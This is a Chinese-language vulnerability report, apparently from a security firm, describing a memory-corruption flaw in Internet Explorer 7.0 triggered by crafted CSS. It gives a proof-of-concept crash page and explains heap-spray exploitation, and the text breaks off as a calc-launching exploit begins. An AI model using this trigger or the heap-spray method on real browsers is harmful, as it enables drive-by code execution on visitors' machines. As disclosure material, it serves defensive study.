MicrosoftInternetExplorer异常CSS样式导致内存破坏漏洞（可以-铱迅.doc

Microsoft Internet Explorer 7.0 异常CSS导致内存破坏漏洞（可以执行任意代码） 内部漏洞编号 （Y 特别注意： 此漏洞报告来自南京铱迅信息技术有限公司，漏洞中的某些部分可能会威胁您的计算机，请提前做好计算机数据备份，防止造成未知的后果！南京铱迅信息技术有限公司拥有最终解释权。 南京铱迅信息技术有限公司 Nanjing Yxlink Information Technologies Co.,Ltd. 目 录 一、漏洞介绍 3 二、相关名词解释 4 三、漏洞细节 5 四、漏洞利用 6  一、漏洞介绍 1．漏洞介绍 在XHTML 1.0标准下，使用特殊构造的CSS样式，在Internet Explorer 7.0 打开特定的网页后，Internet Explorer 7.0将发生内存崩溃，EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码，就可以执行任意命令。 2．漏洞危害(危害等级高) 黑客如果将含有“漏洞利用程序的网页”置于网站上，浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。 二、相关名词解释 1.XHTML 与 DTD XHTML 1.0 提供了三种DTD声明可供选择，其中一种叫做过渡的(Transitional)。 过渡的(Transitional):要求非常宽松的DTD，它允许你继续使用HTML4.01的标识(但是要符合xhtml的写法)。完整代码如下： !DOCTYPE html PUBLIC \-//W3C//DTD XHTML 1.0 Transitional//EN\ \/TR/xhtml1/DTD/xhtml1-transitional.dtd\ 2.Heap Spray 传统Heap Spray是使用javascript去分配内存。根据heap spray的思想，就是用同样的一个指令，去覆盖一片大内存地址，在每块分配到的内存最后，都付上我们的shellcode。当EIP指针访问到大片的NOP指令后，将会走入Shellcode中。 3.CSS CSS是Cascading Style Sheets(层叠样式表)的简称. * CSS语言是一种标记语言,它不需要编译,可以直接由浏览器执行(属于浏览器解释型语言). * 在标准网页设计中CSS负责网页内容(XHTML)的表现. * CSS文件也可以说是一个文本文件,它包含了一些CSS标记,CSS文件必须使用css为文件名后缀. * 可以通过简单的更改CSS文件,改变网页的整体表现形式,可以减少我们的工作量,所以她是每一个网页设计人员的必修课. * CSS是由W3C的CSS工作组产生和维护的. 三、漏洞细节 使用XHTML标准 !DOCTYPE HTML PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN /TR/xhtml1/DTD/xhtml1-transitional.dtd HTML xmlns=/1999/xhtml 构造导致IE 7.0 崩溃的CSS 与 JavaScript HEAD script function load(){ var e; e=document.getElementsByTagName(STYLE)[0]; e.outerHTML=1; } /script STYLE type=text/css body{ overflow: scroll; margin: 0; } /style /HEAD BODY onload=load() /BODY /HTML  四、漏洞利用 1. 通过此漏洞执行Windows的calc命令示例（利用成功后将执行计算器程序） !-- 请将以下内容粘贴到html文件中 南京铱迅信息技术有限公司（Nanjing Yxlink Information Technologies Co.,Ltd.） -- !DOCTYPE HTML PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN /TR/xhtml1/DTD/xhtml1-transitional.dtd HTML xmlns=/1999/xhtml HEAD script function l